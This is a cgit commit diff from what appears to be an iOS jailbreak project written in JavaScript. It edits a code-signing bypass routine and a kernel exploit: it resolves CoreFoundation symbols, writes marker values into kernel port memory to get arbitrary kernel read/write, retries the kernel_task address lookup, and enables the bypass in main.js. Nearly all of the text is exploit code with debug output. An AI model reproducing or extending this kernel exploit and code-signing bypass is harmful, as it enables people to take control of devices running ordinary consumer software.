summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--src/js/csbypass.js7
-rwxr-xr-xsrc/js/kexp/exploit.js12
-rw-r--r--src/js/main.js4
3 files changed, 17 insertions, 6 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 12388a0..cc9302f 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -13,6 +13,7 @@ var my_kIOSurfaceBytesPerRow;
var my_kIOSurfaceWidth;
var my_kIOSurfaceHeight;
var my_kIOSurfacePixelFormat;
+var kCFAllocatorDefault;
function csbypass() {
printf("hello from csbypass!\n");
@@ -34,11 +35,12 @@ function memcpy_exec(dst, src, size) {
printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
printf("dict: %p\n", dict);
- var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
+ var test = CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, pitch);
printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceBytesPerRow), test, 0);
+ printf("lol420\n");
CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
@@ -61,6 +63,7 @@ function linkIOSurface() {
my_IOSurfaceAcceleratorTransferSurface = dlsym(h, "IOSurfaceAcceleratorTransferSurface");
CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide();
+ kCFAllocatorDefault = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFAllocatorDefault");
scall("printf", "%x %x %x\n", my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface);
}
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6f34aaf..47ff1c0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -502,10 +502,15 @@ again: while (true) {
printf("fuck\n");
printf("fuck\n");
- write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i, 0x41410000 | i);
+ }
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i + 0x78, 0x41420000 | i);
+ }
+// write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
@@ -539,6 +544,9 @@ again: while (true) {
printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
printf("fuck\n");
call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ if (kernel_task_addr === 0xffffffff) {
+ continue again;
+ }
scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
printf("fuck\n");
diff --git a/src/js/main.js b/src/js/main.js
index 75d730d..0a1de50 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -79,9 +79,9 @@ function main() {
setup_fancy_rw();
-// csbypass();
+ csbypass();
-// return;
+ return;
printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:46:27 +0000